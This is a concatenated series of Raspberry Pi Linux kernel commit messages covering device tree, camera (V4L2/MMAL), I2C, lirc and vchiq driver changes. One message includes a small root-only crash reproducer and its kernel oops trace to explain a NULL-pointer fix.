Based on the patch authored by Ali Gholami Rudi at
https://lkml.org/lkml/2009/7/13/153
Provide an ioctl for userspace applications, but only if this operation
is hardware accelerated (otherwide it does not make any sense).
Signed-off-by: Siarhei Siamashka <siarhei.siamashka@gmail.com>
The "input" trigger makes the associated GPIO an input. This is to support
the Raspberry Pi PWR LED, which is driven by external hardware in normal use.
N.B. pwr_led is not available on Model A or B boards.
leds-gpio: Implement the brightness_get method
The power LED uses some clever logic that means it is driven
by a voltage measuring circuit when configured as input, otherwise
it is driven by the GPIO output value. This patch wires up the
brightness_get method for leds-gpio so that user-space can monitor
the LED value via /sys/class/gpio/led1/brightness. Using the input
trigger this returns an indication of the system power health,
otherwise it is just whatever value the trigger has written most
recently.
See: https://github.com/raspberrypi/linux/issues/1064
The EPAPR standard says to use "phandle" properties to store phandles,
rather than the deprecated "linux,phandle" version. By default, dtc
generates both, but adding "-H epapr" causes it to only generate
"phandle"s, saving some space and clutter.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Change the filenames and extensions to keep the pre-DDT style of
overlay (<name>-overlay.dtb) distinct from new ones that use a
different style of local fixups (<name>.dtbo), and to match other
platforms.
The RPi firmware uses the DDTK trailer atom to choose which type of
overlay to use for each kernel.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Add the bare minimum needed to boot BCM2708 from a Device Tree.
Signed-off-by: Noralf Tronnes <notro@tronnes.org>
BCM2708: DT: change 'axi' nodename to 'soc'
Change DT node named 'axi' to 'soc' so it matches ARCH_BCM2835.
The VC4 bootloader fills in certain properties in the 'axi' subtree,
but since this is part of an upstreaming effort, the name is changed.
Signed-off-by: Noralf Tronnes notro@tronnes.org
BCM2708_DT: Correct length of the peripheral space
Use dts-dirs feature for overlays.
The kernel makefiles have a dts-dirs target that is for vendor subdirectories.
Using this fixes the install_dtbs target, which previously did not install the overlays.
BCM270X_DT: configure I2S DMA channels
Signed-off-by: Matthias Reichl <hias@horus.com>
BCM270X_DT: switch to bcm2835-i2s
I2S soundcard drivers with proper devicetree support (i.e. not linking
to the cpu_dai/platform via name but to cpu/platform via of_node)
will work out of the box without any modifications.
When the kernel is compiled without devicetree support the platform
code will instantiate the bcm2708-i2s driver and I2S soundcard drivers
will link to it via name, as before.
Signed-off-by: Matthias Reichl <hias@horus.com>
SDIO-overlay: add poll_once-boolean parameter
Add paramter to toggle sdio-device-polling
done every second or once at boot-time.
Signed-off-by: Patrick Boettcher <patrick.boettcher@posteo.de>
BCM270X_DT: Make mmc overlay compatible with current firmware
The original DT overlay logic followed a merge-then-patch procedure,
i.e. parameters are applied to the loaded overlay before the overlay
is merged into the base DTB. This sequence has been changed to
patch-then-merge, in order to support parameterised node names, and
to protect against bad overlays. As a result, overrides (parameters)
must only target labels in the overlay, but the overlay can obviously target nodes in the base DTB.
mmc-overlay.dts (that switches back to the original mmc sdcard
driver) is the only overlay violating that rule, and this patch
fixes it.
bcm270x_dt: Use the sdhost MMC controller by default
The "mmc" overlay reverts to using the other controller.
squash: Add cprman to dt
BCM270X_DT: Use clk_core for I2C interfaces
Includes the new localfixups format.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
scripts/dtc: Fix UMR causing corrupt dtbo overlay files
struct fixup_entry is allocated from the heap but it's member
local_fixup_generated was never initialized. This lead to
corrupted dtbo files.
Fix this by initializing local_fixup_generated to false.
Signed-off-by: Matthias Reichl <hias@horus.com>
scripts/dtc: Only emit local fixups for overlays
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
The Raspberry Pi firmware looks for a trailer on the kernel image to
determine whether it was compiled with Device Tree support enabled.
If the firmware finds a kernel without this trailer, or which has a
trailer indicating that it isn't DT-capable, it disables DT support
and reverts to using ATAGs.
The mkknlimg utility adds that trailer, having first analysed the
image to look for signs of DT support and the kernel version string.
knlinfo displays the contents of the trailer in the given kernel image.
scripts/mkknlimg: Add support for ARCH_BCM2835
Add a new trailer field indicating whether this is an ARCH_BCM2835
build, as opposed to MACH_BCM2708/9. If the loader finds this flag
is set it changes the default base dtb file name from bcm270x...
to bcm283y...
Also update knlinfo to show the status of the field.
scripts/mkknlimg: Improve ARCH_BCM2835 detection
The board support code contains sufficient strings to be able to
distinguish 2708 vs. 2835 builds, so remove the check for
bcm2835-pm-wdt which could exist in either.
Also, since the canned configuration is no longer built in (it's
a module), remove the config string checking.
See: https://github.com/raspberrypi/linux/issues/1157
scripts: Multi-platform support for mkknlimg and knlinfo
The firmware uses tags in the kernel trailer to choose which dtb file
to load. Current firmware loads bcm2835-*.dtb if the '283x' tag is true,
otherwise it loads bcm270*.dtb. This scheme breaks if an image supports
multiple platforms.
This patch adds '270X' and '283X' tags to indicate support for RPi and
upstream platforms, respectively. '283x' (note lower case 'x') is left
for old firmware, and is only set if the image only supports upstream
builds.
scripts/mkknlimg: Append a trailer for all input
Now that the firmware assumes an unsigned kernel is DT-capable, it is
helpful to be able to mark a kernel as being non-DT-capable.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
scripts/knlinfo: Decode DDTK atom
Show the DDTK atom as being a boolean.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
- Supports raw YUV capture, preview, JPEG and H264.
- Uses videobuf2 for data transfer, using dma_buf.
- Uses 3.6.10 timestamping
- Camera power based on use
- Uses immutable input mode on video encoder
Signed-off-by: Daniel Stone <daniels@collabora.com>
Signed-off-by: Luke Diamand <luked@broadcom.com>
V4L2: Fixes from 6by9
V4L2: Fix EV values. Add manual shutter speed control
V4L2 EV values should be in units of 1/1000. Corrected.
Add support for V4L2_CID_EXPOSURE_ABSOLUTE which should
give manual shutter control. Requires manual exposure mode
to be selected first.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Correct JPEG Q-factor range
Should be 1-100, not 0-100
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Fix issue of driver jamming if STREAMON failed.
Fix issue where the driver was left in a partially enabled
state if STREAMON failed, and would then reject many IOCTLs
as it thought it was streaming.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Fix ISO controls.
Driver was passing the index to the GPU, and not the desired
ISO value.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add flicker avoidance controls
Add support for V4L2_CID_POWER_LINE_FREQUENCY to set flicker
avoidance frequencies.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add support for frame rate control.
Add support for frame rate (or time per frame as V4L2
inverts it) control via s_parm.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Improve G_FBUF handling so we pass conformance
Return some sane numbers for get framebuffer so that
we pass conformance.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Fix information advertised through g_vidfmt
Width and height were being stored based on incorrect
values.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add support for inline H264 headers
Add support for V4L2_CID_MPEG_VIDEO_REPEAT_SEQ_HEADER
to control H264 inline headers.
Requires firmware fix to work correctly, otherwise format
has to be set to H264 before this parameter is set.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Fix JPEG timestamp issue
JPEG images were coming through from the GPU with timestamp
of 0. Detect this and give current system time instead
of some invalid value.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Fix issue when switching down JPEG resolution.
JPEG buffer size calculation is based on input resolution.
Input resolution was being configured after output port
format. Caused failures if switching from one JPEG resolution
to a smaller one.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Enable MJPEG encoding
Requires GPU firmware update to support MJPEG encoder.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Correct flag settings for compressed formats
Set flags field correctly on enum_fmt_vid_cap for compressed
image formats.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: H264 profile & level ctrls, FPS control and auto exp pri
Several control handling updates.
H264 profile and level controls.
Timeperframe/FPS reworked to add V4L2_CID_EXPOSURE_AUTO_PRIORITY to
select whether AE is allowed to override the framerate specified.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Correct BGR24 to RGB24 in format table
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add additional pixel formats. Correct colourspace
Adds the other flavours of YUYV, and NV12.
Corrects the overlay advertised colourspace.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Drop logging msg from info to debug
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Initial pass at scene modes.
Only supports exposure mode and metering modes.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add manual white balance control.
Adds support for V4L2_CID_RED_BALANCE and
V4L2_CID_BLUE_BALANCE. Only has an effect if
V4L2_CID_AUTO_N_PRESET_WHITE_BALANCE has
V4L2_WHITE_BALANCE_MANUAL selected.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
config: Enable V4L / MMAL driver
V4L2: Increase the MMAL timeout to 3sec
MJPEG codec flush is now taking longer and results
in a kernel panic if the driver has stopped waiting for
the result when it finally completes.
Increase the timeout value from 1 to 3secs.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add support for setting H264_I_PERIOD
Adds support for the parameter V4L2_CID_MPEG_VIDEO_H264_I_PERIOD
to set the frequency with which I frames are produced.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Enable GPU function for removing padding from images.
GPU can now support arbitrary strides, although may require
additional processing to achieve it. Enable this feature
so that the images delivered are the size requested.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add support for V4L2_PIX_FMT_BGR32
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Set the colourspace to avoid odd YUV-RGB conversions
Removes the amiguity from the conversion routines and stops
them dropping back to the SD vs HD choice of coeffs.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Make video/still threshold a run-time param
Move the define for at what resolution the driver
switches from a video mode capture to a stills mode
capture to module parameters.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Fix incorrect pool sizing
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add option to disable enum_framesizes.
Gstreamer's handling of a driver that advertises
V4L2_FRMSIZE_TYPE_STEPWISE to define the supported
resolutions is broken. See bug
https://bugzilla.gnome.org/show_bug.cgi?id=726521
Optional parameter of gst_v4l2src_is_broken added.
If non-zero, the driver claims not to support that
ioctl, and gstreamer should be happy again (it
guesses a set of defaults for itself).
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add support for more image formats
Adds YVU420 (YV12), YVU420SP (NV21), and BGR888.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Extend range for V4L2_CID_MPEG_VIDEO_H264_I_PERIOD
Request to extend the range from the fairly arbitrary
1000 frames (33 seconds at 30fps). Extend out to the
max range supported (int32 value).
Also allow 0, which is handled by the codec as only
send an I-frame on the first frame and never again.
There may be an exception if it detects a significant
scene change, but there's no easy way around that.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
bcm2835-camera: stop_streaming now has a void return
BCM2835-V4L2: Fix compliance test failures
VIDIOC_TRY_FMT and VIDIOC_S_FMT tests were faling due
to reporting V4L2_COLORSPACE_JPEG when the colour
format wasn't V4L2_PIX_FMT_JPEG.
Now reports V4L2_COLORSPACE_SMPTE170M for YUV formats.
bcm2835 camera planar/packed stride length
Added a field to the mmal_fmt struct used to compute the bytes per line
when using a particular format. This results in the correct stride being
calculated even when the format is planar.
Signed-off-by: Garrett Wilson <g@floft.net>
bcm2835: camera: check for scene not being found
static analysis by cppcheck detected some potential NULL pointer
dereference issues:
[drivers/media/platform/bcm2835/controls.c:854]: (error) Possible null
pointer dereference: scene
(and lines 858, 859 too)
it is possible that scene is not found because of an invalue ctrl->val
and is therefore NULL and hence causing a null pointer dereference.
Signed-off-by: Colin Ian King <colin.king@canonical.com>
bcm2835: memcpy port data to m rather than rmsg
static analysis by cppcheck detected a memcpy to rmsg which is
not actually initialized at that point. The memcpy should be copying
to variable m instead.
Signed-off-by: Colin Ian King <colin.king@canonical.com>
BCM2835-V4L2: Return buffers to videobuf2 on shutdown
https://github.com/raspberrypi/linux/issues/817
Fixes the kernel warning from videobuf2 as buffers
are now returned as they are being flushed on
stop_streaming.
squash: Fixup bcm2835-camera for changes in kernel 4.4 api
v4l2: Fix up driver to upstream timestamp changes
bcm2835-camera: fix a bug in computation of frame timestamp
Fixes#1318
V4L2 driver updates (#1393)
* BCM2835-V4L2: Correct ISO control and add V4L2_CID_ISO_SENSITIVITY_AUTO
https://github.com/raspberrypi/linux/issues/1251
V4L2_CID_ISO_SENSITIVITY was not advertising ISO*1000 as it should.
V4L2_CID_ISO_SENSITIVITY_AUTO was not implemented, so was taking
V4L2_CID_ISO_SENSITIVITY as 0 for auto mode.
Still accepts 0 for auto, but also abides by the new parameter.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
* BCM2835-V4L2: Add a video_nr parameter.
Adds a kernel parameter "video_nr" to specify the preferred
/dev/videoX device node.
https://www.raspberrypi.org/forums/viewtopic.php?f=38&t=136120&p=905545
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
* BCM2835-V4L2: Add support for multiple cameras
Ask GPU on load how many cameras have been detected, and
enumerate that number of devices.
Only applicable on the Compute Module as no other device
exposes multiple CSI2 interfaces.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
* BCM2835-V4L2: Add control of the overlay location and alpha.
Actually do something useful in vidioc_s_fmt_vid_overlay and
vidioc_try_fmt_vid_overlay, rather than effectively having
read-only fields.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
* BCM2835-V4L2: V4L2-Compliance failure fix
VIDIOC_TRY_FMT was failing due to bytesperline not
being set correctly by default.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
* BCM2835-V4L2: Make all module parameters static
Clean up to correct variable scope
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
V4L2: Request maximum resolution from GPU
Get resolution information about the sensors from the GPU
and advertise it correctly.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
BCM2835-V4L2: Increase minimum resolution to 32x32
https://github.com/raspberrypi/linux/issues/1498 showed
up that 16x16 is failing to work on the GPU for some reason.
GPU bug being tracked on
https://github.com/raspberrypi/firmware/issues/607
Workaround here by increasing minimum resolution via V4L2
to 32x32.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
[media]: bcm2835-camera: fix compilation error
There is an error when compiling rpi-4.6.y branch:
CC [M] drivers/media/platform/bcm2835/bcm2835-camera.o
drivers/media/platform/bcm2835/bcm2835-camera.c:639:17: error: initialization from incompatible pointer type [-Werror=incompatible-pointer-types]
.queue_setup = queue_setup,
^
drivers/media/platform/bcm2835/bcm2835-camera.c:639:17: note: (near initialization for 'bm2835_mmal_video_qops.queue_setup')
The const void *parg in setup_queue callback is not needed since commit:
df9ecb0cad.
This commit removes it.
Signed-off-by: Slawomir Stepien <sst@poczta.fm>
bcm2835-camera: Fix max/min error when looping over cameras/resolutions
See: https://github.com/raspberrypi/linux/issues/1447#issuecomment-221303506
BCM2835-V4L2: Correct handling for BGR24 vs RGB24.
There was a bug in the GPU firmware that had reversed these
two formats.
Detect the old firmware, and reverse the formats if necessary.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
Support booting without Device Tree.
Turn on USB power.
Load driver early because of lacking support for deferred probing
in many drivers.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Add module for accessing the mailbox property channel through
/dev/vcio. Was previously in bcm2708-vcio.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
i2c-bcm2708: fixed baudrate
Fixed issue where the wrong CDIV value was set for baudrates below 3815 Hz (for 250MHz bus clock).
In that case the computed CDIV value was more than 0xffff. However the CDIV register width is only 16 bits.
This resulted in incorrect setting of CDIV and higher baudrate than intended.
Example: 3500Hz -> CDIV=0x11704 -> CDIV(16bit)=0x1704 -> 42430Hz
After correction: 3500Hz -> CDIV=0x11704 -> CDIV(16bit)=0xffff -> 3815Hz
The correct baudrate is shown in the log after the cdiv > 0xffff correction.
Perform I2C combined transactions when possible
Perform I2C combined transactions whenever possible, within the
restrictions of the Broadcomm Serial Controller.
Disable DONE interrupt during TA poll
Prevent interrupt from being triggered if poll is missed and transfer
starts and finishes.
i2c: Make combined transactions optional and disabled by default
i2c: bcm2708: add device tree support
Add DT support to driver and add to .dtsi file.
Setup pins in .dts file.
i2c is disabled by default.
Signed-off-by: Noralf Tronnes <notro@tronnes.org>
bcm2708: don't register i2c controllers when using DT
The devices for the i2c controllers are in the Device Tree.
Only register devices when not using DT.
Signed-off-by: Noralf Tronnes <notro@tronnes.org>
I2C: Only register the I2C device for the current board revision
i2c_bcm2708: Fix clock reference counting
Fix grabbing lock from atomic context in i2c driver
2 main changes:
- check for timeouts in the bcm2708_bsc_setup function as indicated by this comment:
/* poll for transfer start bit (should only take 1-20 polls) */
This implies that the setup function can now fail so account for this everywhere it's called
- Removed the clk_get_rate call from inside the setup function as it locks a mutex and that's not ok since we call it from under a spin lock.
i2c-bcm2708: When using DT, leave the GPIO setup to pinctrl
i2c-bcm2708: Increase timeouts to allow larger transfers
Use the timeout value provided by the I2C_TIMEOUT ioctl when waiting
for completion. The default timeout is 1 second.
See: https://github.com/raspberrypi/linux/issues/260
i2c-bcm2708/BCM270X_DT: Add support for I2C2
The third I2C bus (I2C2) is normally reserved for HDMI use. Careless
use of this bus can break an attached display - use with caution.
It is recommended to disable accesses by VideoCore by setting
hdmi_ignore_edid=1 or hdmi_edid_file=1 in config.txt.
The interface is disabled by default - enable using the
i2c2_iknowwhatimdoing DT parameter.
bcm2708-spi: Don't use static pin configuration with DT
Also remove superfluous error checking - the SPI framework ensures the
validity of the chip_select value.
i2c-bcm2708: Remove non-DT support
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Set the BSC_CLKT clock streching timeout to 35ms as per SMBus specs.
Fixes i2c_bcm2708: Write to FIFO correctly - v2 (#1574)
* i2c: fix i2c_bcm2708: Clear FIFO before sending data
Make sure FIFO gets cleared before trying to send
data in case of a repeated start (COMBINED=Y).
* i2c: fix i2c_bcm2708: Only write to FIFO when not full
Check if FIFO can accept data before writing.
To avoid a peripheral read on the last iteration of a loop,
both bcm2708_bsc_fifo_fill and ~drain are changed as well.
BCM270x: Move thermal sensor to Device Tree
Add Device Tree support to bcm2835-thermal driver.
Add thermal sensor device to Device Tree.
Don't add platform device when booting in DT mode.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
lirc_rpi: Use read_current_timer to determine transmitter delay. Thanks to jjmz and others
See: https://github.com/raspberrypi/linux/issues/525
lirc: Remove restriction on gpio pins that can be used with lirc
Compute Module, for example could use different pins
lirc_rpi: Add parameter to specify input pin pull
Depending on the connected IR circuitry it might be desirable to change the
gpios internal pull from it pull-down default behaviour. Add a module
parameter to allow the user to set it explicitly.
Signed-off-by: Julian Scheel <julian@jusst.de>
lirc-rpi: Use the higher-level irq control functions
This module used to access the irq_chip methods of the
gpio controller directly, rather than going through the
standard enable_irq/irq_set_irq_type functions. This
caused problems on pinctrl-bcm2835 which only implements
the irq_enable/disable methods and not irq_unmask/mask.
lirc-rpi: Correct the interrupt usage
1) Correct the use of enable_irq (i.e. don't call it so often)
2) Correct the shutdown sequence.
3) Avoid a bcm2708_gpio driver quirk by setting the irq flags earlier
lirc-rpi: use getnstimeofday instead of read_current_timer
read_current_timer isn't guaranteed to return values in
microseconds, and indeed it doesn't on a Pi2.
Issue: linux#827
lirc-rpi: Add device tree support, and a suitable overlay
The overlay supports DT parameters that match the old module
parameters, except that gpio_in_pull should be set using the
strings "up", "down" or "off".
lirc-rpi: Also support pinctrl-bcm2835 in non-DT mode
fix auto-sense in lirc_rpi driver
On a Raspberry Pi 2, the lirc_rpi driver might receive spurious
interrupts and change it's low-active / high-active setting.
When this happens, the IR remote control stops working.
This patch disables this auto-detection if the 'sense' parameter
was set in the device tree, making the driver robust to such
spurious interrupts.
Use clock manager instead of self-made clockmanager.
Also fix some error paths that showd up during development
(especially missing release of dma resources on rmmod)
Signed-off-by: Martin Sperl <kernel@martin.sperl.org>
Add experimental support for the VideoCore shared memory service.
This allows user processes to allocate memory from VideoCore's
GPU relocatable heap and mmap the buffers. Additionally, the memory
handles can passed to other VideoCore services such as MMAL, OpenMax
and DispmanX
TODO
* This driver was originally released for BCM28155 which has a different
cache architecture to BCM2835. Consequently, in this release only
uncached mappings are supported. However, there's no fundamental
reason which cached mappings cannot be support or BCM2835
* More refactoring is required to remove the typedefs.
* Re-enable the some of the commented out debug-fs statistics which were
disabled when migrating code from proc-fs.
* There's a lot of code to support sharing of VCSM in order to support
Android. This could probably done more cleanly or perhaps just
removed.
Signed-off-by: Tim Gover <timgover@gmail.com>
config: Disable VC_SM for now to fix hang with cutdown kernel
vcsm: Use boolean as it cannot be built as module
On building the bcm_vc_sm as a module we get the following error:
v7_dma_flush_range and do_munmap are undefined in vc-sm.ko.
Fix by making it not an option to build as module
vcsm: Add ioctl for custom cache flushing
vc-sm: Move headers out of arch directory
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Signed-off-by: popcornmix <popcornmix@gmail.com>
BCM270x: Move vc_mem
Make the vc_mem module available for ARCH_BCM2835 by moving it.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Signed-off-by: popcornmix <popcornmix@gmail.com>
vchiq: create_pagelist copes with vmalloc memory
Signed-off-by: Daniel Stone <daniels@collabora.com>
vchiq: fix the shim message release
Signed-off-by: Daniel Stone <daniels@collabora.com>
vchiq: export additional symbols
Signed-off-by: Daniel Stone <daniels@collabora.com>
VCHIQ: Make service closure fully synchronous (drv)
This is one half of a two-part patch, the other half of which is to
the vchiq_lib user library. With these patches, calls to
vchiq_close_service and vchiq_remove_service won't return until any
associated callbacks have been delivered to the callback thread.
VCHIQ: Add per-service tracing
The new service option VCHIQ_SERVICE_OPTION_TRACE is a boolean that
toggles tracing for the specified service.
This commit also introduces vchi_service_set_option and the associated
option VCHI_SERVICE_OPTION_TRACE.
vchiq: Make the synchronous-CLOSE logic more tolerant
vchiq: Move logging control into debugfs
vchiq: Take care of a corner case tickled by VCSM
Closing a connection that isn't fully open requires care, since one
side does not know the other side's port number. Code was present to
handle the case where a CLOSE is sent immediately after an OPEN, i.e.
before the OPENACK has been received, but this was incorrectly being
used when an OPEN from a client using port 0 was rejected.
(In the observed failure, the host was attempting to use the VCSM
service, which isn't present in the 'cutdown' firmware. The failure
was intermittent because sometimes the keepalive service would
grab port 0.)
This case can be distinguished because the client's remoteport will
still be VCHIQ_PORT_FREE, and the srvstate will be OPENING. Either
condition is sufficient to differentiate it from the special case
described above.
vchiq: Avoid high load when blocked and unkillable
vchiq: Include SIGSTOP and SIGCONT in list of signals not-masked by vchiq to allow gdb to work
vchiq_arm: Complete support for SYNCHRONOUS mode
vchiq: Remove inline from suspend/resume
vchiq: Allocation does not need to be atomic
vchiq: Fix wrong condition check
The log level is checked from within the log call. Remove the check in the call.
Signed-off-by: Pranith Kumar <bobby.prani@gmail.com>
BCM270x: Add vchiq device to platform file and Device Tree
Prepare to turn the vchiq module into a driver.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
bcm2708: vchiq: Add Device Tree support
Turn vchiq into a driver and stop hardcoding resources.
Use devm_* functions in probe path to simplify cleanup.
A global variable is used to hold the register address. This is done
to keep this patch as small as possible.
Also make available on ARCH_BCM2835.
Based on work by Lubomir Rintel.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
vchiq: Change logging level for inbound data
vchiq_arm: Two cacheing fixes
1) Make fragment size vary with cache line size
Without this patch, non-cache-line-aligned transfers may corrupt
(or be corrupted by) adjacent data structures.
Both ARM and VC need to be updated to enable this feature. This is
ensured by having the loader apply a new DT parameter -
cache-line-size. The existence of this parameter guarantees that the
kernel is capable, and the parameter will only be modified from the
safe default if the loader is capable.
2) Flush/invalidate vmalloc'd memory, and invalidate after reads
vchiq: fix NULL pointer dereference when closing driver
The following code run as root will cause a null pointer dereference oops:
int fd = open("/dev/vc-cma", O_RDONLY);
if (fd < 0)
err(1, "open failed");
(void)close(fd);
[ 1704.877721] Unable to handle kernel NULL pointer dereference at virtual address 00000000
[ 1704.877725] pgd = b899c000
[ 1704.877736] [00000000] *pgd=37fab831, *pte=00000000, *ppte=00000000
[ 1704.877748] Internal error: Oops: 817 [#1] PREEMPT SMP ARM
[ 1704.877765] Modules linked in: evdev i2c_bcm2708 uio_pdrv_genirq uio
[ 1704.877774] CPU: 2 PID: 3656 Comm: stress-ng-fstat Not tainted 3.19.1-12-generic-bcm2709 #12-Ubuntu
[ 1704.877777] Hardware name: BCM2709
[ 1704.877783] task: b8ab9b00 ti: b7e68000 task.ti: b7e68000
[ 1704.877798] PC is at __down_interruptible+0x50/0xec
[ 1704.877806] LR is at down_interruptible+0x5c/0x68
[ 1704.877813] pc : [<80630ee8>] lr : [<800704b0>] psr: 60080093
sp : b7e69e50 ip : b7e69e88 fp : b7e69e84
[ 1704.877817] r10: b88123c8 r9 : 00000010 r8 : 00000001
[ 1704.877822] r7 : b8ab9b00 r6 : 7fffffff r5 : 80a1cc34 r4 : 80a1cc34
[ 1704.877826] r3 : b7e69e50 r2 : 00000000 r1 : 00000000 r0 : 80a1cc34
[ 1704.877833] Flags: nZCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment user
[ 1704.877838] Control: 10c5387d Table: 3899c06a DAC: 00000015
[ 1704.877843] Process do-oops (pid: 3656, stack limit = 0xb7e68238)
[ 1704.877848] Stack: (0xb7e69e50 to 0xb7e6a000)
[ 1704.877856] 9e40: 80a1cc3c 00000000 00000010 b88123c8
[ 1704.877865] 9e60: b7e69e84 80a1cc34 fff9fee9 ffffffff b7e68000 00000009 b7e69ea4 b7e69e88
[ 1704.877874] 9e80: 800704b0 80630ea4 fff9fee9 60080013 80a1cc28 fff9fee9 b7e69edc b7e69ea8
[ 1704.877884] 9ea0: 8040f558 80070460 fff9fee9 ffffffff 00000000 00000000 00000009 80a1cb7c
[ 1704.877893] 9ec0: 00000000 80a1cb7c 00000000 00000010 b7e69ef4 b7e69ee0 803e1ba4 8040f514
[ 1704.877902] 9ee0: 00000e48 80a1cb7c b7e69f14 b7e69ef8 803e1c9c 803e1b74 b88123c0 b92acb18
[ 1704.877911] 9f00: b8812790 b8d815d8 b7e69f24 b7e69f18 803e2250 803e1bc8 b7e69f5c b7e69f28
[ 1704.877921] 9f20: 80167bac 803e222c 00000000 00000000 b7e69f54 b8ab9ffc 00000000 8098c794
[ 1704.877930] 9f40: b8ab9b00 8000efc4 b7e68000 00000000 b7e69f6c b7e69f60 80167d6c 80167b28
[ 1704.877939] 9f60: b7e69f8c b7e69f70 80047d38 80167d60 b7e68000 b7e68010 8000efc4 b7e69fb0
[ 1704.877949] 9f80: b7e69fac b7e69f90 80012820 80047c84 01155490 011549a8 00000001 00000006
[ 1704.877957] 9fa0: 00000000 b7e69fb0 8000ee5c 80012790 00000000 353d8c0f 7efc4308 00000000
[ 1704.877966] 9fc0: 01155490 011549a8 00000001 00000006 00000000 00000000 76cf3ba0 00000003
[ 1704.877975] 9fe0: 00000000 7efc42e4 0002272f 76e2ed66 60080030 00000003 00000000 00000000
[ 1704.877998] [<80630ee8>] (__down_interruptible) from [<800704b0>] (down_interruptible+0x5c/0x68)
[ 1704.878015] [<800704b0>] (down_interruptible) from [<8040f558>] (vchiu_queue_push+0x50/0xd8)
[ 1704.878032] [<8040f558>] (vchiu_queue_push) from [<803e1ba4>] (send_worker_msg+0x3c/0x54)
[ 1704.878045] [<803e1ba4>] (send_worker_msg) from [<803e1c9c>] (vc_cma_set_reserve+0xe0/0x1c4)
[ 1704.878057] [<803e1c9c>] (vc_cma_set_reserve) from [<803e2250>] (vc_cma_release+0x30/0x38)
[ 1704.878069] [<803e2250>] (vc_cma_release) from [<80167bac>] (__fput+0x90/0x1e0)
[ 1704.878082] [<80167bac>] (__fput) from [<80167d6c>] (____fput+0x18/0x1c)
[ 1704.878094] [<80167d6c>] (____fput) from [<80047d38>] (task_work_run+0xc0/0xf8)
[ 1704.878109] [<80047d38>] (task_work_run) from [<80012820>] (do_work_pending+0x9c/0xc4)
[ 1704.878123] [<80012820>] (do_work_pending) from [<8000ee5c>] (work_pending+0xc/0x20)
[ 1704.878133] Code: e50b1034 e3a01000 e50b2030 e580300c (e5823000)
..the fix is to ensure that we have actually initialized the queue before we attempt
to push any items onto it. This occurs if we do an open() followed by a close() without
any activity in between.
Signed-off-by: Colin Ian King <colin.king@canonical.com>
vchiq_arm: Sort out the vmalloc case
See: https://github.com/raspberrypi/linux/issues/1055
vchiq: hack: Add include depecated dma include file
vchiq_arm: Tweak the logging output
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
vchiq_arm: Access the dequeue_pending flag locked
Reading through this code looking for another problem (now found in userland)
the use of dequeue_pending outside a lock didn't seem safe.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
vchiq_arm: Service callbacks must not fail
Service callbacks are not allowed to return an error. The internal callback
that delivers events and messages to user tasks does not enqueue them if
the service is closing, but this is not an error and should not be
reported as such.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
vchiq_arm: do not use page_cache_release(page) macro (#1403)
This macro is gone since 1fa64f198b.
Signed-off-by: Slawomir Stepien <sst@poczta.fm>
vchiq: Upate to match get_user_pages prototype
vchiq_arm: Add completion records under the mutex
An issue was observed when flushing openmax components
which generate a large number of messages returning
buffers to host.
We occasionally found a duplicate message from 16
messages prior, resulting in a buffer returned twice.
While only one thread adds completions, without the
mutex you don't get the protection of the automatic
memory barrier you get with synchronisation objects.
